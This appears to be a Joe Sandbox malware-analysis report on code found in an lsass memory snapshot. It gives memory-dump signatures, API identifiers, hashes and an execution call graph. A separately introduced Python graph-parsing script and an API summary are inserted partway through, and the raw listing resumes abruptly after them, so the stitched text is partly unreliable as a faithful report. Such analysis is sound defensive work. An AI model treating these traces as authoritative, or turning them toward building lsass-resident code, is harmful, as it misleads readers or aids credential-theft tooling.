                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000202C0AF28DF), ref: 00000202C0AF2A12
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ConsoleMode
                                                          • String ID:
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction ID: 62f884037c56f2eb9e101b9eb6d4c8b48e0da77c088b7664056c18917f8be7ca
                                                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                          • Instruction Fuzzy Hash: C9111526710B04CAFB00CB60E8983AC33A4F719758F450E22EB6D867A5EB78C5688380
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction ID: c36f8d58733dc3f660be89ea2119618fcbbc44045d128cf22e40849943d72586
                                                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                          • Instruction Fuzzy Hash: F7718D72204BC1C6F734DE26A8DC3AE6794F384BC4F420027DFAA47B8ADA75C6188740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 3242871069-1018135373
                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction ID: 28f06788d7490d2f5700d0b906615798fe2339565d29d2b738e9ca2c21cad0d2
                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                          • Instruction Fuzzy Hash: C7516F32312B00CAFB58CF1DE48CBAD7791E754B98F1686279B5A4778ADB79C849C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction ID: 408d19260c6af9364fbe0ad4394b019caa14083f3a6b4c15843173c47a844df2
                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                          • Instruction Fuzzy Hash: 0C61B432504BC4C5E7759F15E48879EB7A0F785B88F054217EB9807B96CB7CC198CB04
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: 5b293359d0d2b51e4d09b33e3e8f78df7785384090e65af87d5b5511161bad2a
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: F351C3262087C1C1F624DE26A4DC3AE7751F3D8B80F460127DFA943B8BDA3AC528C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 26b9c2485665c3f71962b909d1f450666f4b9807b38b51d5cd852ce8c5c245b5
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: EB41AE73625B80C6E760DF65E48C79EA7A0F388784F924123EB4D87759EB79C44ACB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: d80ba936443bac04cb9fd99f09a4bd6c60f5ba5f847f7c682dab857e29dad323
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: 7A111932214B80C2EB618B25F48825DB7E5F788B94F594222EBCD07B65DF39C565CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: b490cb0236f5556427fa48d8edeff5a12f4c048db8e28afcec6f42e5595949fb
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: 1411AD22A01B90C1FB15DB66A88C25D67A0F788FC0F5A4126DF8E53766EF39D4568304
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: ba11de582faed56b1472f891f123a21052092428e15a65ff5d1d74c6b2332d80
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: CEE03932601704DAF718EB62D84C349BAE1EB88B06F468126CB0907351EF7E949D8740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: dffc742d7b09788d05dbad6ec6a9b3515378bf5ce6b0b7ba61dd4a885f199826
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: 79E0ED72611704DAF718EB62D84C35DB6A1FB88B16F468126CB0907351EE39949D9614

                                                          Execution Graph

                                                          Execution Coverage:1.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:1402
                                                          Total number of Limit Nodes:5
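The execution graph in this report is rendered as a flat token stream: a decimal node id, optionally a hex address, then the node's labels (Win32 API names, CRT symbol names, or a collapsed "N API calls" marker), with edges written as src->dst. As an added example, not part of the Joe Sandbox report or its tooling, the Python script below parses that layout back into nodes and edges and enumerates the API sequence along every path from a chosen node, which turns a fragment such as GetProcessIdOfThread / GetCurrentProcessId -> CreateFileW -> WriteFile ReadFile CloseHandle into an explicit call order. The embedded input is a constructed excerpt in the same format; the token rules (node ids are short decimals, addresses are 8-16 lowercase hex digits without 0x, the "N API calls" phrase marks a collapsed subgraph) are assumptions read off the visible dump, not a documented Joe Sandbox format.

```python
"""Parse a Joe Sandbox execution-graph text dump into nodes and edges.

Added example, not part of the Joe Sandbox report or its tooling. The token
rules below are assumptions taken from the dump as it appears on the page.
"""
import re
from collections import defaultdict

# Constructed sample: a few node/edge tokens laid out like the report's dump.
SAMPLE = (
    "execution_graph 7575 2a661302518 GetProcessIdOfThread GetCurrentProcessId "
    "7576 2a6613025be 7575->7576 7577 2a661302543 CreateFileW 7575->7577 "
    "7577->7576 7578 2a661302577 WriteFile ReadFile CloseHandle 7577->7578 "
    "7578->7576 8254 2a6613113f5 8256 2a66130d1f4 __std_exception_copy "
    "13 API calls 8254->8256"
)

NODE_ID = re.compile(r"^\d{1,7}$")          # node ids are short decimals (assumed)
HEX_ADDR = re.compile(r"^[0-9a-f]{8,16}$")   # addresses have no 0x prefix (assumed)
EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_execution_graph(text):
    """Return (nodes, edges); nodes maps id -> {'addr': str|None, 'labels': [...]}."""
    # Fold the collapsed-subgraph marker "13 API calls" into one token so that
    # its leading number is not mistaken for a node id.
    text = re.sub(r"(\d+) API calls", r"\1_API_calls", text)
    nodes, edges = {}, []
    current = None
    for tok in text.split():
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            current = None
            continue
        if NODE_ID.match(tok):
            current = int(tok)
            nodes.setdefault(current, {"addr": None, "labels": []})
            continue
        if current is None:          # e.g. the leading "execution_graph" word
            continue
        node = nodes[current]
        if node["addr"] is None and not node["labels"] and HEX_ADDR.match(tok):
            node["addr"] = tok       # first token after a node id is its address
        else:
            node["labels"].append(tok)
    return nodes, edges


def is_api(label):
    """Heuristic: keep Win32 API names, drop CRT internals and collapsed markers."""
    return (not label.startswith("_") and "::" not in label
            and not label.endswith("_API_calls"))


def referenced_apis(nodes):
    """Sorted set of distinct API names labelling any node."""
    return sorted({l for n in nodes.values() for l in n["labels"] if is_api(l)})


def api_sequences(nodes, edges, start, max_depth=8):
    """Enumerate the API labels met along every simple path from `start`.

    Each result is a tuple of API names in traversal order; a path ends at a
    node with no unvisited successor or when max_depth nodes have been seen."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    results = []

    def walk(node, path, seen):
        apis = [l for l in nodes.get(node, {"labels": []})["labels"] if is_api(l)]
        path = path + apis
        nxt = [n for n in succ[node] if n not in seen]   # cycle-safe
        if not nxt or len(seen) >= max_depth:
            results.append(tuple(path))
            return
        for n in nxt:
            walk(n, path, seen | {n})

    walk(start, [], {start})
    return results


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE)
    print("APIs referenced:", ", ".join(referenced_apis(nodes)))
    for seq in api_sequences(nodes, edges, 7575):
        print(" -> ".join(seq) or "(no API calls)")
```

Labels that start with an underscore or contain "::" (for example __std_exception_copy or Concurrency::details::SchedulerProxy::DeleteThis) are statically linked MSVC CRT functions rather than imports, so the filter keeps them out of the API sequences; they are still present in the parsed node labels if needed.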
                                                          execution_graph: rendered call graph of the analysed code (node addresses in the 0x2a6613xxxxx range); the raw node and edge listing is not reproduced here.
                                                          APIs referenced by graph nodes: CloseHandle, CreateFileW, DeleteCriticalSection, EnterCriticalSection, FlsGetValue, FlsSetValue, FreeLibrary, GetCurrentProcess, GetCurrentProcessId, GetFileType, GetLastError, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetProcAddress, GetProcessHeap, GetProcessIdOfThread, HeapAlloc, HeapFree, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, IsDebuggerPresent, IsProcessorFeaturePresent, LeaveCriticalSection, LoadLibraryExW, lstrlenW, ReadFile, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, StrCmpIW, StrCmpNIW, StrCmpW, StrCpyW, TerminateProcess, TlsAlloc, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile.
                                                          Statically linked CRT symbols resolved in the graph: __CxxCallCatchBlock, __GSHandlerCheckCommon, __scrt_dllmain_exception_filter, __std_exception_copy, __vcrt_FlsAlloc, __vcrt_uninitialize_locks, __vcrt_uninitialize_ptd, _invalid_parameter_noinfo, Concurrency::details::SchedulerProxy::DeleteThis.
13 API calls 9105->9108 9116 2a66130fa61 9106->9116 9120 2a66130c5ac LeaveCriticalSection 9106->9120 9111 2a66130f94e 9108->9111 9113 2a66130d04c _invalid_parameter_noinfo 38 API calls 9111->9113 9112->9106 9114 2a66130cab0 _invalid_parameter_noinfo 14 API calls 9112->9114 9113->9101 9115 2a66130f9f3 9114->9115 9117 2a66130cab0 _invalid_parameter_noinfo 14 API calls 9115->9117 9118 2a66130cab0 14 API calls _invalid_parameter_noinfo 9116->9118 9117->9106 9118->9116 9122 2a661308672 9123 2a6613090c0 __std_exception_copy 38 API calls 9122->9123 9124 2a66130869d 9123->9124 7857 2a6613146f5 7866 2a661309324 7857->7866 7859 2a66131470d 7860 2a661309324 __CxxCallCatchBlock 9 API calls 7859->7860 7861 2a661314728 7860->7861 7862 2a661309324 __CxxCallCatchBlock 9 API calls 7861->7862 7863 2a66131473c 7862->7863 7864 2a661309324 __CxxCallCatchBlock 9 API calls 7863->7864 7865 2a66131477e 7864->7865 7869 2a661309340 7866->7869 7868 2a66130932d 7868->7859 7870 2a661309358 7869->7870 7871 2a66130935f GetLastError 7869->7871 7870->7868 7881 2a661309c8c 7871->7881 7882 2a661309aac __vcrt_FlsAlloc 5 API calls 7881->7882 7883 2a661309cb3 TlsGetValue 7882->7883 8287 2a661305974 8288 2a66130597a 8287->8288 8299 2a661307fa0 8288->8299 8292 2a661305a77 8293 2a6613059de 8292->8293 8296 2a661305bfd 8292->8296 8312 2a661307b80 8292->8312 8295 2a661305cfb 8296->8295 8297 2a661305d77 VirtualProtect 8296->8297 8297->8293 8298 2a661305da3 GetLastError 8297->8298 8298->8293 8302 2a661307fab 8299->8302 8300 2a6613059bd 8300->8293 8308 2a661304400 8300->8308 8301 2a66130b470 __std_exception_copy 2 API calls 8301->8302 8302->8300 8302->8301 8303 2a661307fca 8302->8303 8304 2a661307fd5 8303->8304 8318 2a6613087b8 8303->8318 8322 2a6613087d8 8304->8322 8309 2a66130441d 8308->8309 8311 2a66130448c 8309->8311 8331 2a661304670 8309->8331 8311->8292 8313 2a661307bc7 8312->8313 8356 2a661307950 8313->8356 8316 2a661308070 _invalid_parameter_noinfo 8 API calls 8317 2a661307bf1 8316->8317 8317->8292 8319 
2a6613087c6 std::bad_alloc::bad_alloc 8318->8319 8326 2a661309178 8319->8326 8321 2a6613087d7 8323 2a6613087e6 std::bad_alloc::bad_alloc 8322->8323 8324 2a661309178 Concurrency::cancel_current_task 2 API calls 8323->8324 8325 2a661307fdb 8324->8325 8327 2a661309197 8326->8327 8328 2a6613091c0 RtlPcToFileHeader 8327->8328 8329 2a6613091e2 RaiseException 8327->8329 8330 2a6613091d8 8328->8330 8329->8321 8330->8329 8332 2a661304694 8331->8332 8338 2a6613046b7 8331->8338 8332->8338 8345 2a661304120 8332->8345 8333 2a6613046ed 8334 2a66130471d 8333->8334 8339 2a661304250 2 API calls 8333->8339 8337 2a661304753 8334->8337 8343 2a661304120 3 API calls 8334->8343 8340 2a66130476f 8337->8340 8341 2a661304120 3 API calls 8337->8341 8338->8333 8351 2a661304250 8338->8351 8339->8334 8342 2a66130478b 8340->8342 8344 2a661304250 2 API calls 8340->8344 8341->8340 8342->8311 8343->8337 8344->8342 8350 2a661304141 8345->8350 8346 2a6613041b0 8346->8338 8347 2a661304196 VirtualQuery 8347->8346 8347->8350 8348 2a6613041ca VirtualAlloc 8348->8346 8349 2a6613041fb GetLastError 8348->8349 8349->8350 8350->8346 8350->8347 8350->8348 8352 2a661304268 8351->8352 8353 2a6613042bd VirtualQuery 8352->8353 8354 2a6613042d7 8352->8354 8355 2a661304322 GetLastError 8352->8355 8353->8352 8353->8354 8354->8333 8355->8352 8357 2a66130796b 8356->8357 8358 2a66130798f 8357->8358 8359 2a661307981 SetLastError 8357->8359 8358->8316 8359->8358 9125 2a661302ed8 9127 2a661302f35 9125->9127 9126 2a661302f50 9127->9126 9128 2a6613038a8 3 API calls 9127->9128 9128->9126 8360 2a66130c1d8 8361 2a66130c1f1 8360->8361 8362 2a66130c209 8360->8362 8361->8362 8363 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8361->8363 8363->8362 8693 2a66130d658 8694 2a66130d67d 8693->8694 8698 2a66130d694 8693->8698 8695 2a66130d1f4 __std_exception_copy 13 API calls 8694->8695 8696 2a66130d682 8695->8696 8699 2a66130d04c _invalid_parameter_noinfo 38 API calls 8696->8699 8697 2a66130d724 8700 
2a66130bb54 13 API calls 8697->8700 8698->8697 8708 2a66130d6da 8698->8708 8710 2a66130d7b6 8698->8710 8726 2a66130d894 8698->8726 8788 2a66130da18 8698->8788 8701 2a66130d68d 8699->8701 8702 2a66130d77c 8700->8702 8704 2a66130d784 8702->8704 8714 2a66130d7d7 8702->8714 8707 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8704->8707 8706 2a66130d836 8711 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8706->8711 8709 2a66130d78b 8707->8709 8713 2a66130d6fd 8708->8713 8717 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8708->8717 8709->8713 8718 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8709->8718 8710->8713 8716 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8710->8716 8712 2a66130d841 8711->8712 8715 2a66130d85a 8712->8715 8720 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8712->8720 8719 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8713->8719 8714->8706 8714->8714 8723 2a66130d87c 8714->8723 8825 2a661310eb8 8714->8825 8721 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8715->8721 8716->8710 8717->8708 8718->8709 8719->8701 8720->8712 8721->8701 8724 2a66130d06c _invalid_parameter_noinfo 17 API calls 8723->8724 8725 2a66130d891 8724->8725 8727 2a66130d8c2 8726->8727 8727->8727 8728 2a66130d8de 8727->8728 8729 2a66130d220 __std_exception_copy 13 API calls 8727->8729 8728->8698 8730 2a66130d90d 8729->8730 8731 2a66130d926 8730->8731 8732 2a661310eb8 38 API calls 8730->8732 8733 2a661310eb8 38 API calls 8731->8733 8735 2a66130d9fc 8731->8735 8732->8731 8734 2a66130d943 8733->8734 8734->8735 8736 2a66130d97f 8734->8736 8738 2a66130d98d 8734->8738 8739 2a66130d962 8734->8739 8737 2a66130d06c _invalid_parameter_noinfo 17 API calls 8735->8737 8741 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8736->8741 8749 2a66130da17 
8737->8749 8742 2a66130d977 8738->8742 8834 2a66130eee0 8738->8834 8740 2a66130d220 __std_exception_copy 13 API calls 8739->8740 8743 2a66130d96d 8740->8743 8741->8735 8742->8736 8746 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8742->8746 8747 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8743->8747 8745 2a66130da7a 8750 2a66130da8c 8745->8750 8757 2a66130daa1 8745->8757 8746->8736 8747->8742 8748 2a66130d9b5 8751 2a66130d9ba 8748->8751 8752 2a66130d9d0 8748->8752 8749->8745 8843 2a6613113d8 8749->8843 8755 2a66130d894 52 API calls 8750->8755 8756 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8751->8756 8754 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8752->8754 8754->8736 8782 2a66130da9c 8755->8782 8756->8742 8759 2a66130dd78 14 API calls 8757->8759 8758 2a661308070 _invalid_parameter_noinfo 8 API calls 8760 2a66130dd64 8758->8760 8761 2a66130db0b 8759->8761 8760->8698 8762 2a66130db1a 8761->8762 8763 2a66130f198 9 API calls 8761->8763 8852 2a66130d30c 8762->8852 8763->8762 8766 2a66130dba8 8767 2a66130d894 52 API calls 8766->8767 8769 2a66130dbb8 8767->8769 8768 2a66130dd78 14 API calls 8771 2a66130dbd2 8768->8771 8770 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8769->8770 8769->8782 8770->8782 8771->8768 8772 2a66130f198 9 API calls 8771->8772 8774 2a66130d894 52 API calls 8771->8774 8775 2a66130dcc8 FindNextFileW 8771->8775 8776 2a66130dd2a 8771->8776 8778 2a66130d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8771->8778 8874 2a66130d4ac 8771->8874 8772->8771 8774->8771 8775->8771 8777 2a66130dce0 8775->8777 8780 2a66130dd38 FindClose 8776->8780 8785 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8776->8785 8779 2a66130dd0c FindClose 8777->8779 8896 2a661310b20 8777->8896 8778->8771 8779->8782 8784 2a66130dd1c 8779->8784 8781 2a66130dd48 8780->8781 8780->8782 8786 
2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8781->8786 8782->8758 8787 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8784->8787 8785->8780 8786->8782 8787->8782 8789 2a66130da58 8788->8789 8790 2a66130da7a 8788->8790 8789->8790 8792 2a6613113d8 38 API calls 8789->8792 8791 2a66130da8c 8790->8791 8794 2a66130daa1 8790->8794 8793 2a66130d894 56 API calls 8791->8793 8792->8789 8819 2a66130da9c 8793->8819 8796 2a66130dd78 14 API calls 8794->8796 8795 2a661308070 _invalid_parameter_noinfo 8 API calls 8797 2a66130dd64 8795->8797 8798 2a66130db0b 8796->8798 8797->8698 8799 2a66130db1a 8798->8799 8800 2a66130f198 9 API calls 8798->8800 8801 2a66130d30c 16 API calls 8799->8801 8800->8799 8802 2a66130db7b FindFirstFileExW 8801->8802 8803 2a66130dba8 8802->8803 8809 2a66130dbd2 8802->8809 8804 2a66130d894 56 API calls 8803->8804 8806 2a66130dbb8 8804->8806 8805 2a66130dd78 14 API calls 8805->8809 8807 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8806->8807 8806->8819 8807->8819 8808 2a66130f198 9 API calls 8808->8809 8809->8805 8809->8808 8810 2a66130d4ac 16 API calls 8809->8810 8811 2a66130d894 56 API calls 8809->8811 8812 2a66130dcc8 FindNextFileW 8809->8812 8813 2a66130dd2a 8809->8813 8815 2a66130d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8809->8815 